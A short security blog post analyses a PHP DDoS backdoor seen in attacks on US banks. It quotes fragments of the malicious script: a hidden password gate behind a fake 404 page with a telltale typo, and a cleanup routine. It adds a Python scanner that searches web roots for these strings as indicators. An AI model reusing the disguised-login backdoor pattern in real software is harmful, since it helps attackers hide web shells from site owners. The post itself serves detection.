DDoS PHP-Script

Just recently the BSI warned about an ongoing attack on US banks.
The PHP script involved showed a “404” error when called without any
arguments.

A closer look shows a “404 Not Foun derror” WITH the typo in it.
Now we have a neat string to search for in Google or wherever...
and bingo: some other victim already posted the source code
of the infected webserver:

 

Here we can see that a POST action “stop” makes the DDoS go away..


function stoped()
{
@unlink($base."stmdu.php");
@unlink($base."stp.hp");
cmdexec("killall ping;");
print "Stop & Clean";
}

And here is where the typo sits:


if(md5(md5(md5($_REQUEST['pass'])))!=$pass_up and $_SESSION['LoGiN']!=true)
{
print "404 Not Found

Not Found

The requested URL ".$_SERVER['PHP_SELF']." was not found on this server

Additionally, a 404 Not Foun derror was encountered while trying to use an Error Document to handle the request

";
die();
exit();
}
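
The typo and the other strings in the two snippets above also work as file-level indicators when checking your own web root. The following is an added example, not code from the original post or from the script itself: a small Python scanner that looks for those strings in PHP files. The file extensions, the size limit and the sample web root built in demo() are assumptions made for the demonstration.

```python
import os
import re
import tempfile

# Indicators taken from the snippets quoted in this post.
INDICATORS = {
    "fake-404-typo": re.compile(rb"404 Not Foun derror"),
    "triple-md5-pass": re.compile(
        rb"md5\(\s*md5\(\s*md5\(\s*\$_REQUEST\[['\"]pass['\"]\]"),
    "killall-ping": re.compile(rb"killall\s+ping"),
}
PHP_EXT = (".php", ".php5", ".phtml", ".inc")  # assumed set of extensions

def scan_file(path, max_bytes=2 * 1024 * 1024):
    """Return the sorted names of the indicators found in one file."""
    try:
        with open(path, "rb") as fh:
            data = fh.read(max_bytes)
    except OSError:
        return []  # unreadable file: skip it
    return sorted(n for n, rx in INDICATORS.items() if rx.search(data))

def scan_tree(root):
    """Walk root and map relative path -> indicators for each matching PHP file."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(PHP_EXT):
                full = os.path.join(dirpath, fn)
                found = scan_file(full)
                if found:
                    hits[os.path.relpath(full, root)] = found
    return hits

def demo():
    """Scan a constructed web root holding one clean and one flagged file."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "img"))
        with open(os.path.join(root, "index.php"), "wb") as fh:
            fh.write(b"<?php print 'hello'; ?>")
        # Constructed, inert sample that only carries the strings to match.
        with open(os.path.join(root, "img", "x.php"), "wb") as fh:
            fh.write(b"<?php if(md5(md5(md5($_REQUEST['pass'])))!=$p){"
                     b"print '404 Not Foun derror';die();} ?>")
        return scan_tree(root)

if __name__ == "__main__":
    for path, names in demo().items():
        print(path, names)
```

A hit on the typo alone is already a strong signal, since a genuine server error page would not contain it.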

 

 
